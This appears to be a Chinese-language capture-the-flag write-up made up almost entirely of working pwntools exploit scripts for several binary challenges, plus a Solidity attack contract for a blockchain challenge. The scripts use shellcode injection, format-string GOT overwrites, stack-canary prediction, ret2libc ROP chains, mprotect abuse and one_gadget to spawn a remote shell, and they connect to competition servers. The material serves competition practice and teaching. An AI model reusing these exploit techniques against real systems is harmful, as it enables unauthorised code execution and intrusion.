io.sendlineafter('backdoor!',payload1)
#----------------------------------------------------------
#pause()
#----------------------------------------------------------
io.interactive()
ezpwn
重置read,使read函数可以读取更长shellcode
from pwn import *
from LibcSearcher import *
from ctypes import *
from struct import pack
import time
context(os='linux', arch='amd64', log_level='debug')
local = 0
if(local == 0): #本地练习
io = process('./pwn')
elif(local == 1): #比赛本地方便替换
io = process('/home/yu/CTF/PWN/chal')
elif(local == 2): #NSSCTF
io = remote('node4.anna.nssctf.cn',28186)
elif(local == 3): #BUUCTF
io = remote('node4.buuoj.cn',28067)
else: #比赛远程
io = remote('112.6.51.212',32892)
elfnum = 0
if(elfnum == 0): #日常练习
elf = ELF('./pwn')
else: #比赛方便更换
elf = ELF('/home/yu/CTF/PWN/chal')
chooselibc = 0
pwnlibc = 1
match chooselibc:
case 0:
if(pwnlibc == 0): #其他版本
libc = ELF('/home/yu/CTF/PWN/Libc/libc.so.6')
else: #本地
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
case 1: #16.04
if(pwnlibc == 0):
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.23-x32.so')
else:
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.23-x64.so')
case 2: #18.04
if(pwnlibc == 0):
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.27-x32.so')
else:
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.27-x64.so')
case 3: #19.04
if(pwnlibc == 0):
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.29-x32.so')
else:
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.29-x64.so')
case 4: #20.04
if(pwnlibc == 0):
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.30-x32.so')
else:
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.30-x64.so')
def debug():
gdb.attach(io)
pause()
#----------------------------------------------------------
#调试
#gdb.attach(io,'b *0x401290') #断点调试/PIE调试
#gdb.attach(io) #程序调试
#----------------------------------------------------------
shellcode = asm('''
xor rax,rax
mov dx,0x100
syscall
''')
payload = b'/bin/sh\x00' + shellcode
io.send(payload)
payload1 = b'a' * 9 + asm(shellcraft.sh())
io.send(payload1)
#----------------------------------------------------------
#pause()
#----------------------------------------------------------
io.interactive()
write2
from pwn import *
from LibcSearcher import *
from ctypes import *
from struct import pack
import time
context(os='linux', arch='amd64', log_level='debug')
local = 1
if(local == 0): #本地练习
io = process('./pwn')
elif(local == 1): #比赛本地方便替换
io = process('/home/yu/CTF/PWN/chal')
elif(local == 2): #NSSCTF
io = remote('node4.anna.nssctf.cn',28186)
elif(local == 3): #BUUCTF
io = remote('node4.buuoj.cn',28067)
else: #比赛远程
io = remote('pwn.node.game.sycsec.com',31130)
elfnum = 1
if(elfnum == 0): #日常练习
elf = ELF('./pwn')
else: #比赛方便更换
elf = ELF('/home/yu/CTF/PWN/chal')
chooselibc = 0
pwnlibc = 1
match chooselibc:
case 0:
if(pwnlibc == 0): #其他版本
libc = ELF('/home/yu/CTF/PWN/libc.so.6')
else: #本地
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
case 1: #16.04
if(pwnlibc == 0):
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.23-x32.so')
else:
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.23-x64.so')
case 2: #18.04
if(pwnlibc == 0):
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.27-x32.so')
else:
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.27-x64.so')
case 3: #19.04
if(pwnlibc == 0):
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.29-x32.so')
else:
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.29-x64.so')
case 4: #20.04
if(pwnlibc == 0):
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.30-x32.so')
else:
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.30-x64.so')
def debug():
gdb.attach(io)
pause()
#----------------------------------------------------------
#调试
#gdb.attach(io , 'b 0x') #断点调试
#gdb.attach(io , 'b *$rebase(0x12FB)') #PIE调试
#gdb.attach(io) #程序调试
#----------------------------------------------------------
io.recvuntil(b':')
v1 = int(io.recv(14),16)
v2 = v1 + 0x44 - 0x08
sh = v1 + 4
shellcode = asm('''
push rdx;
pop rsi;
mov ax,0x3b;
add rdi,0x580;
syscall
nop
nop
nop
nop
''')
io.sendline(shellcode)
for i in range(6):
io.sendline(str(32 + i))
io.sendline(str(hex((v2 >> (8 * i)) & 0xff)))
binsh = 0x68732f2f6e69622f
for i in range(8):
io.sendline(str(48 + i))
io.sendline(str(hex((binsh >> (8 * i)) & 0xff)))
io.sendline(str(48 + 8))
io.sendline(str(hex(0)))
for i in range(6):
io.sendline(str(64 + i))
io.sendline(str(hex((sh >> (8 * i)) & 0xff)))
io.sendline(b'-1')
#----------------------------------------------------------
#pause()
#----------------------------------------------------------
io.interactive()
fmt1.0
格式化字符串利用
from pwn import *
from LibcSearcher import *
from ctypes import *
from struct import pack
import time
context(os='linux', arch='amd64', log_level='debug')
local = 4
if(local == 0): #本地练习
io = process('./pwn')
elif(local == 1): #比赛本地方便替换
io = process('/home/yu/CTF/PWN/fmt1.0')
elif(local == 2): #NSSCTF
io = remote('node4.anna.nssctf.cn',28186)
elif(local == 3): #BUUCTF
io = remote('node4.buuoj.cn',28067)
else: #比赛远程
io = remote('pwn.node.game.sycsec.com',31631)
elfnum = 1
if(elfnum == 0): #日常练习
elf = ELF('./pwn')
else: #比赛方便更换
elf = ELF('/home/yu/CTF/PWN/fmt1.0')
chooselibc = 0
pwnlibc = 0
match chooselibc:
case 0:
if(pwnlibc == 0): #其他版本
libc = ELF('/home/yu/CTF/PWN/libc.so.6')
else: #本地
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
case 1: #16.04
if(pwnlibc == 0):
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.23-x32.so')
else:
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.23-x64.so')
case 2: #18.04
if(pwnlibc == 0):
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.27-x32.so')
else:
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.27-x64.so')
case 3: #19.04
if(pwnlibc == 0):
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.29-x32.so')
else:
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.29-x64.so')
case 4: #20.04
if(pwnlibc == 0):
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.30-x32.so')
else:
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.30-x64.so')
def debug():
gdb.attach(io)
pause()
#----------------------------------------------------------
#调试
#gdb.attach(io,'b *0x4012AD') #断点调试/PIE调试
#gdb.attach(io) #程序调试
#----------------------------------------------------------
ret = 0x40101a
rdi = 0x401353
main = elf.sym['vuln']
printf_plt = elf.plt['printf']
printf_got = elf.got['printf']
execve_plt = elf.plt['execve']
execve_got = elf.got['execve']
payload=fmtstr_payload(6,{printf_got:execve_plt}).ljust(0x58,b'a') + p64(main)
io.sendafter(b'\n',payload)
io.sendline(b'/bin/sh\x00')
#----------------------------------------------------------
#pause()
#----------------------------------------------------------
io.interactive()
write_canary
伪随机计算canary
from pwn import *
from LibcSearcher import *
from ctypes import *
from struct import pack
import time
#context(os='linux', arch='amd64', log_level='debug')
context(arch = 'amd64')
local = 4
if(local == 0): #本地练习
io = process('./pwn')
elif(local == 1): #比赛本地方便替换
io = process('/home/yu/CTF/PWN/chal')
elif(local == 2): #NSSCTF
io = remote('node4.anna.nssctf.cn',28186)
elif(local == 3): #BUUCTF
io = remote('node4.buuoj.cn',28067)
else: #比赛远程
io = remote('pwn.node.game.sycsec.com',31130)
# elfnum = 1
# if(elfnum == 0): #日常练习
# elf = ELF('./pwn')
# else: #比赛方便更换
# elf = ELF('/home/yu/CTF/PWN/chal')
chooselibc = 0
pwnlibc = 0
match chooselibc:
case 0:
if(pwnlibc == 0): #其他版本
libc = ELF('/home/yu/CTF/PWN/libc.so.6')
else: #本地
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
case 1: #16.04
if(pwnlibc == 0):
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.23-x32.so')
else:
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.23-x64.so')
case 2: #18.04
if(pwnlibc == 0):
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.27-x32.so')
else:
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.27-x64.so')
case 3: #19.04
if(pwnlibc == 0):
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.29-x32.so')
else:
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.29-x64.so')
case 4: #20.04
if(pwnlibc == 0):
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.30-x32.so')
else:
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.30-x64.so')
def debug():
gdb.attach(io)
pause()
#----------------------------------------------------------
#调试
#gdb.attach(io,'b *0x4012AD') #断点调试/PIE调试
#gdb.attach(io) #程序调试
#----------------------------------------------------------
buf0 = 0x04040E0
buf1 = 0x04040E0 + 0x800
my_libc = cdll.LoadLibrary('/home/yu/CTF/PWN/libc.so.6')
my_libc.srand(my_libc.time(0) % 60)
v2 = my_libc.rand()
v3 = my_libc.rand()
canary = (((v2 >> 4) ^ (16 * v3 + (v3 >> 8) * (v2 << 8))) >> 32)
canary += ((((v2 >> 48) + (v2 << 16) * (v3 >> 16)) ^ (v3 << 48)) << 32)
canary = canary & 0xffffffffffffffff
print(hex(canary))
shellcode = asm(shellcraft.open('flag') + shellcraft.read(3,buf1,0x100) + shellcraft.write(1,buf1,0x100))
io.sendline(shellcode)
payload = b'a' * 0x08 + p64(canary) + p64(0) + p64(buf0)
io.sendline(payload)
#----------------------------------------------------------
#pause()
#----------------------------------------------------------
io.interactive()
ez_fullprotection
from pwn import *
from LibcSearcher import *
from ctypes import *
from struct import pack
import time
context(os='linux', arch='amd64', log_level='debug')
local = 4
if(local == 0): #本地练习
io = process('./pwn')
elif(local == 1): #比赛本地方便替换
io = process('/home/yu/CTF/PWN/ez_fullprotection')
elif(local == 2): #NSSCTF
io = remote('node4.anna.nssctf.cn',28186)
elif(local == 3): #BUUCTF
io = remote('node4.buuoj.cn',28067)
else: #比赛远程
io = remote('112.6.51.212',30555)
elfnum = 1
if(elfnum == 0): #日常练习
elf = ELF('./pwn')
else: #比赛方便更换
elf = ELF('/home/yu/CTF/PWN/ez_fullprotection')
chooselibc = 0
pwnlibc = 0
match chooselibc:
case 0:
if(pwnlibc == 0): #其他版本
libc = ELF('/home/yu/CTF/PWN/libc.so.6')
else: #本地
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
case 1: #16.04
if(pwnlibc == 0):
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.23-x32.so')
else:
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.23-x64.so')
case 2: #18.04
if(pwnlibc == 0):
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.27-x32.so')
else:
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.27-x64.so')
case 3: #19.04
if(pwnlibc == 0):
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.29-x32.so')
else:
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.29-x64.so')
case 4: #20.04
if(pwnlibc == 0):
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.30-x32.so')
else:
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.30-x64.so')
def debug():
gdb.attach(io)
pause()
#----------------------------------------------------------
#调试
#gdb.attach(io,'b main') #断点调试
#gdb.attach(io,'b *$rebase(0x128B)') #PIE调试
#gdb.attach(io) #程序调试
#----------------------------------------------------------
io.sendlineafter('name: ',b'dijia')
io.sendlineafter('guess :',b'a')
io.recvuntil(b'entered ')
pie_base = int(io.recvuntil(b'.',drop = True),10) - elf.sym['_start']
print(hex(pie_base))
rdi = pie_base + 0x016e3
rsi_r15 = pie_base + 0x016e1
ret = pie_base + 0x0101a
put_plt = pie_base + elf.plt['puts']
put_got = pie_base + elf.got['puts']
main = pie_base + 0x1541
pl1 = b'a' * 0x38 + p64(rdi) + p64(put_got) + p64(put_plt) + p64(main)
pl1 = pl1.ljust(0x18a8,b'a')
io.sendline(pl1)
puts_addr = u64(io.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
base = puts_addr - libc.sym['puts']
system = base + libc.sym['system']
binsh = base + next(libc.search(b'/bin/sh\x00'))
rdx = base + 0x142c92
syscall = base + 0x2284d
rax = base + 0x036174
pl2 = b'a' * 0x38 + p64(rdi) + p64(binsh) + p64(rsi_r15) + p64(0) * 2 + p64(rdx) + p64(0) + p64(rax) + p64(0x3b) + p64(syscall)
pl2 = pl2.ljust(0x18a8,b'a')
sleep(0.5)
io.sendline(pl2)
#----------------------------------------------------------
#pause()
#----------------------------------------------------------
io.interactive()
why_n0t_puts
利用magicgadget
ROPgadget --binary why_n0t_puts | grep ret | grep "\[rbp"
from pwn import *
from LibcSearcher import *
from ctypes import *
from struct import pack
import time
context(os='linux', arch='amd64', log_level='debug')
local = 1
if(local == 0): #本地练习
io = process('./pwn')
elif(local == 1): #比赛本地方便替换
io = process('/home/yu/CTF/PWN/why_n0t_puts')
elif(local == 2): #NSSCTF
io = remote('node4.anna.nssctf.cn',28186)
elif(local == 3): #BUUCTF
io = remote('node4.buuoj.cn',28067)
else: #比赛远程
io = remote('112.6.51.212',30511)
elfnum = 1
if(elfnum == 0): #日常练习
elf = ELF('./pwn')
else: #比赛方便更换
elf = ELF('/home/yu/CTF/PWN/why_n0t_puts')
chooselibc = 0
pwnlibc = 0
match chooselibc:
case 0:
if(pwnlibc == 0): #其他版本
libc = ELF('/home/yu/CTF/PWN/libc.so.6')
else: #本地
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
case 1: #16.04
if(pwnlibc == 0):
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.23-x32.so')
else:
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.23-x64.so')
case 2: #18.04
if(pwnlibc == 0):
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.27-x32.so')
else:
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.27-x64.so')
case 3: #19.04
if(pwnlibc == 0):
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.29-x32.so')
else:
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.29-x64.so')
case 4: #20.04
if(pwnlibc == 0):
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.30-x32.so')
else:
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.30-x64.so')
def debug():
gdb.attach(io)
pause()
#----------------------------------------------------------
#调试
#gdb.attach(io,'b main') #断点调试
#gdb.attach(io,'b *$rebase(0x128B)') #PIE调试
#gdb.attach(io) #程序调试
#----------------------------------------------------------
read_plt = elf.plt['read']
read_got = elf.got['read']
rdi = 0x4011d3
rsi = 0x4011d1
magic= 0x40111c # add dword ptr [rbp - 0x3d], ebx ; nop ; ret
bss = 0x404000
csu1 = 0x4011CA
csu2 = 0x4011B0
leave_ret = 0x401162
call_read = 0x401158
pl1 = 0x38 * b'\x00'
pl1 += p64(csu1)
pl1 += p64(0)
pl1 += p64(1)
pl1 += p64(0)
pl1 += p64(bss+0x200)
pl1 += p64(0x200)
pl1 += p64(read_got)
pl1 += p64(csu2)
pl1 += p64(0x41)
pl1 += p64(bss+0x200-8) * 6
pl1 += p64(leave_ret)
io.sendline(pl1)
libc = elf.libc
mprotect = libc.sym['mprotect']
read_offset = libc.sym['read']
offset = (mprotect - read_offset)
target = elf.got['read']
pl2 = p64(csu1)
pl2 += p64(offset) + p64(target+0x3d) + p64(0) * 4
pl2 += p64(magic)
pl2 += p64(csu1)
pl2 += p64(0)
pl2 += p64(1)
pl2 += p64(bss)
pl2 += p64(0x1000)
pl2 += p64(0x7)
pl2 += p64(target)
pl2 += p64(csu2)
pl2 += p64(0x42) * 7
pl2 += p64(bss + 0x200 + len(pl2)+8)
pl2 += b'\x90' * 0x10
pl2 += asm(shellcraft.sh())
io.sendline(pl2)
#----------------------------------------------------------
#pause()
#----------------------------------------------------------
io.interactive()
EVA
from pwn import *
from LibcSearcher import *
from ctypes import *
from struct import pack
import time
context(os='linux', arch='amd64', log_level='debug')
local = 1
if(local == 0): #本地练习
io = process('./pwn')
elif(local == 1): #比赛本地方便替换
io = process('/home/yu/CTF/PWN/EVA')
elif(local == 2): #NSSCTF
io = remote('node4.anna.nssctf.cn',28186)
elif(local == 3): #BUUCTF
io = remote('node4.buuoj.cn',28067)
else: #比赛远程
io = remote('112.6.51.212',31374)
elfnum = 1
if(elfnum == 0): #日常练习
elf = ELF('./pwn')
else: #比赛方便更换
elf = ELF('/home/yu/CTF/PWN/EVA')
chooselibc = 0
pwnlibc = 0
match chooselibc:
case 0:
if(pwnlibc == 0): #其他版本
libc = ELF('/home/yu/CTF/PWN/libc.so.6')
else: #本地
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
case 1: #16.04
if(pwnlibc == 0):
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.23-x32.so')
else:
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.23-x64.so')
case 2: #18.04
if(pwnlibc == 0):
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.27-x32.so')
else:
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.27-x64.so')
case 3: #19.04
if(pwnlibc == 0):
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.29-x32.so')
else:
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.29-x64.so')
case 4: #20.04
if(pwnlibc == 0):
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.30-x32.so')
else:
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.30-x64.so')
def debug():
gdb.attach(io)
pause()
#----------------------------------------------------------
#调试
#gdb.attach(io,'b main') #断点调试
#gdb.attach(io,'b *$rebase(0x128B)') #PIE调试
#gdb.attach(io) #程序调试
#----------------------------------------------------------
stack = 0x404b00
main = 0x40128A
rdi = 0x401423
ret = 0x40101a
rbp = 0x4011dd
put_plt = elf.plt['puts']
put_got = elf.got['puts']
io.sendlineafter("Evangelion>",str(2))
pl1 = p64(stack) + p64(main)
io.sendafter("watch\n",pl1)
io.sendlineafter("Evangelion>",str(2))
pl2 = p64(0x404af8 + 0x41) + p64(0x04012F3)
io.sendafter("watch\n",pl2)
canary = u64(io.recv(8)) & int(('ff' * 7),16)
canary = canary << 8
io.sendline(str(1))
pl3 = b'a' * 0x1f + p64(rdi) + p64(put_got) + p64(put_plt) + p64(rbp) + p64(stack) + p64(0x0401355)
io.sendafter("like-minded!",pl3)
puts_addr = u64(io.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
base = puts_addr - libc.sym['puts']
system = base + libc.sym['system']
binsh = base + next(libc.search(b'/bin/sh\x00'))
pl4 = b'a' * 0x48 + p64(canary) + p64(0) + p64(ret) + p64(rdi) + p64(binsh) + p64(system)
io.send(pl4)
#----------------------------------------------------------
#pause()
#----------------------------------------------------------
io.interactive()
fmt2.0
利用one_gadget
from pwn import *
from LibcSearcher import *
from ctypes import *
from struct import pack
import time
context(os='linux', arch='amd64', log_level='debug')
local = 1
if(local == 0): #本地练习
io = process('./pwn')
elif(local == 1): #比赛本地方便替换
io = process('/home/yu/CTF/PWN/fmt2.0')
elif(local == 2): #NSSCTF
io = remote('node4.anna.nssctf.cn',28186)
elif(local == 3): #BUUCTF
io = remote('node4.buuoj.cn',28067)
else: #比赛远程
io = remote('112.6.51.212',32892)
elfnum = 1
if(elfnum == 0): #日常练习
elf = ELF('./pwn')
else: #比赛方便更换
elf = ELF('/home/yu/CTF/PWN/fmt2.0')
chooselibc = 0
pwnlibc = 0
match chooselibc:
case 0:
if(pwnlibc == 0): #其他版本
libc = ELF('/home/yu/CTF/PWN/libc.so.6')
else: #本地
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
case 1: #16.04
if(pwnlibc == 0):
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.23-x32.so')
else:
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.23-x64.so')
case 2: #18.04
if(pwnlibc == 0):
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.27-x32.so')
else:
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.27-x64.so')
case 3: #19.04
if(pwnlibc == 0):
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.29-x32.so')
else:
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.29-x64.so')
case 4: #20.04
if(pwnlibc == 0):
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.30-x32.so')
else:
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.30-x64.so')
def debug():
gdb.attach(io)
pause()
#----------------------------------------------------------
#调试
#gdb.attach(io,'b main') #断点调试
#gdb.attach(io,'b *$rebase(0x128B)') #PIE调试
#gdb.attach(io) #程序调试
#----------------------------------------------------------
io.recvuntil(':')
io.send(b'%p-%19$p')
rsp = int(io.recv(14),16) - 0x8
io.recvuntil('-')
libc_base = int(io.recv(14),16) - 0xf3 - libc.sym['__libc_start_main']
one_gadget = libc_base + 0xe3b01
ret = rsp + 0x70
system_low = one_gadget & 0xffff
system_high = (one_gadget >> 16) & 0xffff
payload = b'%' + str(system_low).encode() + b'c%10$hn'
payload += b'%' + str(system_high - system_low).encode() + b'c%11$hn'
payload = payload.ljust(0x20,b'b')
payload += p64(ret) + p64(ret + 2)
io.sendafter('second str:',payload)
#----------------------------------------------------------
#pause()
#----------------------------------------------------------
io.interactive()
Blockchain
SimpleConnect
公共地址区块链,直接把出题人的交易记录
give_me_Goerlieth
同上
stage
输入source获取源码
pragma solidity ^0.8.4;
interface IReceiver {
function getNumber() external view returns(uint256);
}
contract stageGame{
mapping (address => bool) private flag;
mapping (address => bool) public isStage1Completed;
function stage1() external {
uint size;
address addr = msg.sender;
assembly { size := extcodesize(addr) }
require(size == 0,"EOA must!");
isStage1Completed[msg.sender] = true;
}
function stage2(uint _guess) external {
require(isStage1Completed[msg.sender],"You should complete stage1 first!");
uint number = block.timestamp % 100 + 1;
require(number == _guess, "Wrong number!");
_stage3();
}
function _stage3() private {
uint size;
address addr = msg.sender;
assembly { size := extcodesize(addr) }
require(size > 0,"Contract must!");
uint256 number1;
uint256 number2;
(bool success,bytes memory data1) = addr.staticcall(abi.encodeWithSignature("getNumber()"));
require(success,"First call failed!");
number1 = abi.decode(data1, (uint256));
(bool success2,bytes memory data2) = addr.call(abi.encodeWithSignature("getNumber()"));
require(success2,"Second call failed!");
number2 = abi.decode(data2, (uint256));
require(number1 != number2, "Must return different Number!");
flag[tx.origin] = true;
}
function check(address addr) external view returns(bool){
return flag[addr];
}
}
简单的分析一下,stage1在判断代码量是否为0,stage2需要传入值,对我们传入的值进行判断,相同则进行stage3,stage3则要求静态调用获取的值number1与正常调用获取的值number2不同,则输出
这里我们需要自己构造hack函数,stage1可以通过contract函数来进行绕过,stage2可以直接传入block.timestamp % 100 + 1,stage3就根据https://ranwen.de/posts/2023-09-17-metatrust23/
contract exp{
stageGame public StageGame;
constructor(address _Address) {
StageGame = stageGame(_Address);
StageGame.stage1();
}
function getNumber() external view returns (uint256) {
uint gbef=0;
uint gaft=0;
assembly
{
gbef:=gas()
let x:=sload(0x66666)
gaft:=gas()
}
uint gasc=gbef-gaft;
if(gasc>2000)
return uint256(0);
return uint256(1);
}
function hack(address addr) public returns(bool){
bool flag=false;
uint256 number=block.timestamp % 100 + 1;
StageGame.stage2(number);
flag=StageGame.check(addr);
return flag;
}
}
最新评论